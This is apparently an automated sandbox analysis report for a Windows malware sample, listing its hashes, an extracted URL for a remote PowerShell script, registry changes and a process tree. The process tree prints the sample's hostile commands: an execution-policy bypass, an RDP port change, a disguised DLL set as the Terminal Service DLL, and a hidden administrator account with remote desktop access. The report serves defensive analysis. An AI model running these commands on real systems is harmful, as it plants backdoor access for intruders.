Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
29-09-2021 16:05
Static task
static1
Behavioral task
behavioral1
Sample
74f029d2fd587f9e25091f7832bea2f2.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
74f029d2fd587f9e25091f7832bea2f2.exe
Resource
win10-en-20210920
General
-
Target
74f029d2fd587f9e25091f7832bea2f2.exe
-
Size
5.7MB
-
MD5
74f029d2fd587f9e25091f7832bea2f2
-
SHA1
76fb2d051d6dc938ba2b7131ef1b21c0fe2ad60c
-
SHA256
5f0c0223d10468b9130a240432342f4056c6d7c2f6f89469c9d971bcea31255a
-
SHA512
0386c61a89b414ab50c2c7b371d2bab288bde154da35c643de423622b05e99fcc748f5b0b9e53f8da00e6dccd02cf535b6d41c15fbddfa732a599db3bac45a23
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 8 372 powershell.exe 10 372 powershell.exe 11 372 powershell.exe 12 372 powershell.exe 14 372 powershell.exe 16 372 powershell.exe 18 372 powershell.exe 20 372 powershell.exe 22 372 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 3348 3348 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIDC1D.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIDC9C.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIDCAD.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_g1j1hied.aeb.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIDC7C.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIDCAE.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_dnbkg0pr.yqd.ps1 powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 10 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 11 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 12 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 14 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2620 powershell.exe 2620 powershell.exe 2620 powershell.exe 1128 powershell.exe 1128 powershell.exe 1128 powershell.exe 984 powershell.exe 984 powershell.exe 984 powershell.exe 1856 powershell.exe 1856 powershell.exe 1856 powershell.exe 2620 powershell.exe 2620 powershell.exe 2620 powershell.exe 372 powershell.exe 372 powershell.exe 372 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 632 632 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2620 powershell.exe Token: SeDebugPrivilege 1128 powershell.exe Token: SeIncreaseQuotaPrivilege 1128 powershell.exe Token: SeSecurityPrivilege 1128 powershell.exe Token: SeTakeOwnershipPrivilege 1128 powershell.exe Token: SeLoadDriverPrivilege 1128 powershell.exe Token: SeSystemProfilePrivilege 1128 powershell.exe Token: SeSystemtimePrivilege 1128 powershell.exe Token: SeProfSingleProcessPrivilege 1128 powershell.exe Token: SeIncBasePriorityPrivilege 1128 powershell.exe Token: SeCreatePagefilePrivilege 1128 powershell.exe Token: SeBackupPrivilege 1128 powershell.exe Token: SeRestorePrivilege 1128 powershell.exe Token: SeShutdownPrivilege 1128 powershell.exe Token: SeDebugPrivilege 1128 powershell.exe Token: SeSystemEnvironmentPrivilege 1128 powershell.exe Token: SeRemoteShutdownPrivilege 1128 powershell.exe Token: SeUndockPrivilege 1128 powershell.exe Token: SeManageVolumePrivilege 1128 powershell.exe Token: 33 1128 powershell.exe Token: 34 1128 powershell.exe Token: 35 1128 powershell.exe Token: 36 1128 powershell.exe Token: SeDebugPrivilege 984 powershell.exe Token: SeIncreaseQuotaPrivilege 984 powershell.exe Token: SeSecurityPrivilege 984 powershell.exe Token: SeTakeOwnershipPrivilege 984 powershell.exe Token: SeLoadDriverPrivilege 984 powershell.exe Token: SeSystemProfilePrivilege 984 powershell.exe Token: SeSystemtimePrivilege 984 powershell.exe Token: SeProfSingleProcessPrivilege 984 powershell.exe Token: SeIncBasePriorityPrivilege 984 powershell.exe Token: SeCreatePagefilePrivilege 984 powershell.exe Token: SeBackupPrivilege 984 powershell.exe Token: SeRestorePrivilege 984 powershell.exe Token: SeShutdownPrivilege 984 powershell.exe Token: SeDebugPrivilege 984 powershell.exe Token: SeSystemEnvironmentPrivilege 984 powershell.exe Token: SeRemoteShutdownPrivilege 984 powershell.exe Token: SeUndockPrivilege 984 powershell.exe Token: SeManageVolumePrivilege 984 powershell.exe Token: 33 984 powershell.exe Token: 34 984 powershell.exe Token: 35 984 powershell.exe Token: 36 984 powershell.exe Token: SeDebugPrivilege 1856 powershell.exe Token: SeIncreaseQuotaPrivilege 1856 powershell.exe Token: SeSecurityPrivilege 1856 powershell.exe Token: SeTakeOwnershipPrivilege 1856 powershell.exe Token: SeLoadDriverPrivilege 1856 powershell.exe Token: SeSystemProfilePrivilege 1856 powershell.exe Token: SeSystemtimePrivilege 1856 powershell.exe Token: SeProfSingleProcessPrivilege 1856 powershell.exe Token: SeIncBasePriorityPrivilege 1856 powershell.exe Token: SeCreatePagefilePrivilege 1856 powershell.exe Token: SeBackupPrivilege 1856 powershell.exe Token: SeRestorePrivilege 1856 powershell.exe Token: SeShutdownPrivilege 1856 powershell.exe Token: SeDebugPrivilege 1856 powershell.exe Token: SeSystemEnvironmentPrivilege 1856 powershell.exe Token: SeRemoteShutdownPrivilege 1856 powershell.exe Token: SeUndockPrivilege 1856 powershell.exe Token: SeManageVolumePrivilege 1856 powershell.exe Token: 33 1856 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
74f029d2fd587f9e25091f7832bea2f2.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 2112 wrote to memory of 2620 2112 74f029d2fd587f9e25091f7832bea2f2.exe powershell.exe PID 2112 wrote to memory of 2620 2112 74f029d2fd587f9e25091f7832bea2f2.exe powershell.exe PID 2620 wrote to memory of 1168 2620 powershell.exe csc.exe PID 2620 wrote to memory of 1168 2620 powershell.exe csc.exe PID 1168 wrote to memory of 3176 1168 csc.exe cvtres.exe PID 1168 wrote to memory of 3176 1168 csc.exe cvtres.exe PID 2620 wrote to memory of 1128 2620 powershell.exe powershell.exe PID 2620 wrote to memory of 1128 2620 powershell.exe powershell.exe PID 2620 wrote to memory of 984 2620 powershell.exe powershell.exe PID 2620 wrote to memory of 984 2620 powershell.exe powershell.exe PID 2620 wrote to memory of 1856 2620 powershell.exe powershell.exe PID 2620 wrote to memory of 1856 2620 powershell.exe powershell.exe PID 2620 wrote to memory of 1884 2620 powershell.exe reg.exe PID 2620 wrote to memory of 1884 2620 powershell.exe reg.exe PID 2620 wrote to memory of 1168 2620 powershell.exe reg.exe PID 2620 wrote to memory of 1168 2620 powershell.exe reg.exe PID 2620 wrote to memory of 952 2620 powershell.exe reg.exe PID 2620 wrote to memory of 952 2620 powershell.exe reg.exe PID 2620 wrote to memory of 1180 2620 powershell.exe net.exe PID 2620 wrote to memory of 1180 2620 powershell.exe net.exe PID 1180 wrote to memory of 1068 1180 net.exe net1.exe PID 1180 wrote to memory of 1068 1180 net.exe net1.exe PID 2620 wrote to memory of 1012 2620 powershell.exe cmd.exe PID 2620 wrote to memory of 1012 2620 powershell.exe cmd.exe PID 1012 wrote to memory of 3944 1012 cmd.exe cmd.exe PID 1012 wrote to memory of 3944 1012 cmd.exe cmd.exe PID 3944 wrote to memory of 1564 3944 cmd.exe net.exe PID 3944 wrote to memory of 1564 3944 cmd.exe net.exe PID 1564 wrote to memory of 512 1564 net.exe net1.exe PID 1564 wrote to memory of 512 1564 net.exe net1.exe PID 2620 wrote to memory of 656 2620 powershell.exe cmd.exe PID 2620 wrote to memory of 656 2620 powershell.exe cmd.exe PID 656 wrote to memory of 2780 656 cmd.exe cmd.exe PID 656 wrote to memory of 2780 656 cmd.exe cmd.exe PID 2780 wrote to memory of 1040 2780 cmd.exe net.exe PID 2780 wrote to memory of 1040 2780 cmd.exe net.exe PID 1040 wrote to memory of 3908 1040 net.exe net1.exe PID 1040 wrote to memory of 3908 1040 net.exe net1.exe PID 1272 wrote to memory of 412 1272 cmd.exe net.exe PID 1272 wrote to memory of 412 1272 cmd.exe net.exe PID 412 wrote to memory of 1052 412 net.exe net1.exe PID 412 wrote to memory of 1052 412 net.exe net1.exe PID 1464 wrote to memory of 3344 1464 cmd.exe net.exe PID 1464 wrote to memory of 3344 1464 cmd.exe net.exe PID 3344 wrote to memory of 664 3344 net.exe net1.exe PID 3344 wrote to memory of 664 3344 net.exe net1.exe PID 3912 wrote to memory of 1340 3912 cmd.exe net.exe PID 3912 wrote to memory of 1340 3912 cmd.exe net.exe PID 1340 wrote to memory of 2692 1340 net.exe net1.exe PID 1340 wrote to memory of 2692 1340 net.exe net1.exe PID 1180 wrote to memory of 912 1180 cmd.exe net.exe PID 1180 wrote to memory of 912 1180 cmd.exe net.exe PID 912 wrote to memory of 3284 912 net.exe net1.exe PID 912 wrote to memory of 3284 912 net.exe net1.exe PID 692 wrote to memory of 4052 692 cmd.exe net.exe PID 692 wrote to memory of 4052 692 cmd.exe net.exe PID 4052 wrote to memory of 524 4052 net.exe net1.exe PID 4052 wrote to memory of 524 4052 net.exe net1.exe PID 1168 wrote to memory of 1980 1168 cmd.exe net.exe PID 1168 wrote to memory of 1980 1168 cmd.exe net.exe PID 1980 wrote to memory of 2664 1980 net.exe net1.exe PID 1980 wrote to memory of 2664 1980 net.exe net1.exe PID 3344 wrote to memory of 1312 3344 cmd.exe WMIC.exe PID 3344 wrote to memory of 1312 3344 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\74f029d2fd587f9e25091f7832bea2f2.exe"C:\Users\Admin\AppData\Local\Temp\74f029d2fd587f9e25091f7832bea2f2.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2z1qaywo\2z1qaywo.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES99E4.tmp" "c:\Users\Admin\AppData\Local\Temp\2z1qaywo\CSC1D3CD46C682B479DBBFE64360723EB8.TMP"4⤵PID:3176
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1128
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1856
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:1884
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:1168
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:952
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1068
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:1012 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:3944 -
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:512
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:1040 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:3908
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:1060
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:3808
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
PID:1272 -
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
PID:412 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵PID:1052
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc thjtNX1g /add1⤵
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\system32\net.exenet.exe user wgautilacc thjtNX1g /add2⤵
- Suspicious use of WriteProcessMemory
PID:3344 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc thjtNX1g /add3⤵PID:664
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3912 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:1340 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵PID:2692
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:912 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD3⤵PID:3284
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:692 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:4052 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵PID:524
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc thjtNX1g1⤵
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Windows\system32\net.exenet.exe user wgautilacc thjtNX1g2⤵
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc thjtNX1g3⤵PID:2664
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
PID:3344 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵PID:1312
-
-
